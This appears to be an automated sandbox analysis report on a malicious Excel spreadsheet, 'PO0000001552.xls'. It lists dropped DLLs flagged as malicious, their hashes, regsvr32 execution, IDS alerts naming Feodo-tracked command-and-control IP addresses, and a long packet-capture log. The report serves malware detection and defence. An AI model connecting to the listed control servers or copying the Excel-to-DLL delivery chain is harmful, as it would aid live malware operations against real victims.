                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".m.q.1.D.m.D.F.W.T.v.n.4.h.D.i.n.C.m.P.I.f.i.b.v.O.F.I.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.I.W.6.x.Y.3.3.2.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):433152
                                                                                                                                            Entropy (8bit):6.773063357716462
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
                                                                                                                                            MD5:DD7105E9748A29B5BD61EA57214D57E3
                                                                                                                                            SHA1:827B323BDA769BA7FB838A231AA4160209266B14
                                                                                                                                            SHA-256:C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
                                                                                                                                            SHA-512:BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):433152
                                                                                                                                            Entropy (8bit):6.7730613530277655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
                                                                                                                                            MD5:3929B889987F447CB837ED326860AFC6
                                                                                                                                            SHA1:9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
                                                                                                                                            SHA-256:B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
                                                                                                                                            SHA-512:EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 30 12:46:13 2022, mtime=Sun Nov 13 17:26:48 2022, atime=Sun Nov 13 17:26:48 2022, length=93184, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):527
                                                                                                                                            Entropy (8bit):4.687349495162638
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:4xtQl37wc4esXsbxSXzK9wm2PholjAlpYelsgFUiILlaWUdPFmJXSZXASzZXyav8:87c4xsbx4zK9wm2SjA0Jaldi3Fm2
                                                                                                                                            MD5:732950BB2A1CFEF84B6969CFFE0ABDE7
                                                                                                                                            SHA1:D674D7EFF59B48E8A8749F8D5C2801B6E3CE87DA
                                                                                                                                            SHA-256:6FDB0C9FA6FC38384EE7B77C0D481EBF5F9D771C29739A7DAF62E54626568E28
                                                                                                                                            SHA-512:290B32795635A528AD9CF40553B7ABFB6D44CD2558C4DF37F92E30B585562982D4E60253F7CE6F55F95BE5F8C6AC4ABEC0C1ABE45148FCB66C9D6BD9BE40A4CB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.... ....:..v...(.!~.....R.~.....l......................p.n.2..l..mUU. .PO0000~1.XLS..R.......U.mmUU......^....................q...P.O.0.0.0.0.0.0.1.5.5.2...x.l.s.......X...............-.......W...........;S.......C:\Users\user\Desktop\PO0000001552.xls..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.0.0.0.0.0.0.1.5.5.2...x.l.s.`.......X.......134349..........N...n..O...}R......i(..........N...n..O...}R......i(..........E.......9...1SPS..mD..pH.H@..=x.....h....H....F.5./EG.gM.U..............
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:Generic INItialization configuration [xls]
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):75
                                                                                                                                            Entropy (8bit):4.363995491825093
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:bDuMJltOvCpulmMYdvCpulv:bCmOaEYdac
                                                                                                                                            MD5:F9CBF4D309E73196DBCB3C5F14717F77
                                                                                                                                            SHA1:26353BE9CD1B9EBDCE83B69267B48D80472BC7A6
                                                                                                                                            SHA-256:7CB5B3C956A55B3E4A70A8DA7615CAF7D7960B89BFE00C0EC8553680BF87150F
                                                                                                                                            SHA-512:47D359B978738F514DD3735DF520D1ACF9A55EAAF49C9A30D902342F345D74CCA24D323ABD0CC75CE7C2AAB3CA0FBACD2E62F07624AF55501CA39355E8EB552B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[folders]..Templates.LNK=0..PO0000001552.LNK=0..[xls]..PO0000001552.LNK=0..
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):433152
                                                                                                                                            Entropy (8bit):6.7730613530277655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
                                                                                                                                            MD5:3929B889987F447CB837ED326860AFC6
                                                                                                                                            SHA1:9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
                                                                                                                                            SHA-256:B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
                                                                                                                                            SHA-512:EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):433152
                                                                                                                                            Entropy (8bit):6.773063357716462
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
                                                                                                                                            MD5:DD7105E9748A29B5BD61EA57214D57E3
                                                                                                                                            SHA1:827B323BDA769BA7FB838A231AA4160209266B14
                                                                                                                                            SHA-256:C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
                                                                                                                                            SHA-512:BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):433152
                                                                                                                                            Entropy (8bit):6.773063357716462
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uw:Py7EzZ4+HvY62LxHJ4KTGDlT
                                                                                                                                            MD5:DD7105E9748A29B5BD61EA57214D57E3
                                                                                                                                            SHA1:827B323BDA769BA7FB838A231AA4160209266B14
                                                                                                                                            SHA-256:C987AD0CC79B598BDEE9EC7DA96B07E82A04CADD73CB3CAF85B799731DEEF9A1
                                                                                                                                            SHA-512:BECA102422697E4CD50B81289BDC5097935F11C0C5ACC86B7A69893FB819A3CD225E4B2594A2BB40163FBD68D7AC281B0FF260F30B55CF188112445EB26986B7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):433152
                                                                                                                                            Entropy (8bit):6.7730613530277655
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:PZUCuTJlyIOziaTGy+IeIt1xJh5eWhv/w62LcuPv8cD4mRKqdONyAzDxkMwp2/uz:Py7EzZ4+HvY62LxHJ4KTGDlT
                                                                                                                                            MD5:3929B889987F447CB837ED326860AFC6
                                                                                                                                            SHA1:9BB1A7622F2BC5A6A51487434A77F395DE5E50D7
                                                                                                                                            SHA-256:B2AA99DEF35F913B42B882122C8DD5F72CEEAB82F6747F1B659C8632CD6EB902
                                                                                                                                            SHA-512:EF4DB4F06EE1F85AB96AA70FC5DD05A062DA6A5D13F9A643AFE471F6FDC9FEA62FF39F3C951286B7A865C66C53E0E73FD84E2E5030E1843F24FE014CE7BA9715
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...l...l...l...l../l...l..2l...l.."l...l...l...l...l...l..*l...l..+l...l..,l...lRich...l................PE..d....)mc.........." .................[....................................................@.........................................pg..W....\..d.......T............................................................................ ..8............................text............................... ..`.rdata...G... ...H..................@..@.data..../...p.......N..............@....pdata...............j..............@..@text................................@.. .rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 10 07:26:07 2022, Security: 0
                                                                                                                                            Entropy (8bit):5.506793373203057
                                                                                                                                            TrID:
                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                            File name:PO0000001552.xls
                                                                                                                                            File size:93184
                                                                                                                                            MD5:ecdc3f1e9afd2ce212a12ba3a844f521
                                                                                                                                            SHA1:0121ba555dfe0b42834759d201cce505bd619f86
                                                                                                                                            SHA256:1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
                                                                                                                                            SHA512:0b3f8566d8e4c49a0698f398e1d1e95ba6f750ccc25f204b1e9526ff6ef6f81e3131f70779ee88365ad65851d21ddeaefd20dab203cdba39b24c1d1a920dec9e
                                                                                                                                            SSDEEP:1536:vKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgHbCXuZH4gb4CEn9J4ZvX5:vKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgF
                                                                                                                                            TLSH:3B933A86B2F9D89DEA19C734889B4390A762EC204B564BCB3244F3A67FB0D501F539D7
                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                                            Icon Hash:74f4e4c2cec4c0d4
                                                                                                                                            Document Type:OLE
                                                                                                                                            Number of OLE Files:1
                                                                                                                                            Has Summary Info:
                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                            Encrypted Document:False
                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                            Contains ObjectPool Stream:False
                                                                                                                                            Flash Objects Count:0
                                                                                                                                            Contains VBA Macros:False
                                                                                                                                            Code Page:1251
                                                                                                                                            Author:
                                                                                                                                            Last Saved By:
                                                                                                                                            Create Time:2015-06-05 18:19:34
                                                                                                                                            Last Saved Time:2022-11-10 07:26:07
                                                                                                                                            Creating Application:
                                                                                                                                            Security:0
                                                                                                                                            Document Code Page:1251
                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                            Company:
                                                                                                                                            Contains Dirty Links:False
                                                                                                                                            Shared Document:False
                                                                                                                                            Changed Hyperlinks:False
                                                                                                                                            Application Version:1048576
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:0.3985130586395627
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . $ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . S h e e t 5 . . . . . S h e e t 6 . . . . . S h e
                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 24 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 e1 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:4096
                                                                                                                                            Entropy:0.2784985381370367
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . G y d a r . . . . . . . . . . . G y d a r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                            General
                                                                                                                                            Stream Path:Workbook
                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                            Stream Size:82874
                                                                                                                                            Entropy:5.92856896968195
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . G y d a r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . P . 8 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 47 79 64 61 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            192.168.2.3182.162.143.56497124432404316 11/13/22-19:28:07.391953TCP2404316ET CNC Feodo Tracker Reported CnC Server TCP group 949712443192.168.2.3182.162.143.56
                                                                                                                                            192.168.2.345.63.99.234970970802404334 11/13/22-19:27:51.342965TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 18497097080192.168.2.345.63.99.23
                                                                                                                                            192.168.2.31.1.1.163177532023883 11/13/22-19:27:02.730666UDP2023883ET DNS Query to a *.top domain - Likely Hostile6317753192.168.2.31.1.1.1
                                                                                                                                            192.168.2.3173.255.211.88497054432404314 11/13/22-19:27:33.992872TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 849705443192.168.2.3173.255.211.88
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 13, 2022 19:26:49.746951103 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:49.746999025 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:49.747102022 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:49.748613119 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:49.748639107 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.236835957 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.237086058 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.285685062 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.285739899 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.286483049 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.286737919 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.287277937 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.287300110 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.694597006 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.694730997 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.694792032 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.694830894 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.696415901 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.696441889 CET44349697175.98.167.165192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:50.696466923 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:50.696533918 CET49697443192.168.2.3175.98.167.165
                                                                                                                                            Nov 13, 2022 19:26:51.585938931 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:51.794390917 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:51.794640064 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:51.795133114 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:51.994139910 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000014067 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000138044 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000183105 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000225067 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000261068 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000277042 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000313997 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000363111 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000385046 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000435114 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000454903 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000504017 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000525951 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000581980 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000592947 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000633001 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000658989 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000716925 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.000727892 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.000770092 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194159031 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194242954 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194303036 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194353104 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194401026 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194463015 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194478035 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194503069 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194545031 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194587946 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194613934 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194658995 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194681883 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194709063 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194742918 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194761038 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194802999 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194828987 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194880962 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.194896936 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194942951 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.194962978 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195020914 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195030928 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195075989 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195101976 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195158958 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195168972 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195214033 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195231915 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195291042 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195302010 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195353985 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195364952 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195410967 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.195431948 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.195487976 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385291100 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385369062 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385411978 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385436058 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385490894 CET4969980192.168.2.347.92.35.35
                                                                                                                                            Nov 13, 2022 19:26:52.385512114 CET804969947.92.35.35192.168.2.3
                                                                                                                                            Nov 13, 2022 19:26:52.385562897 CET804969947.92.35.35192.168.2.3
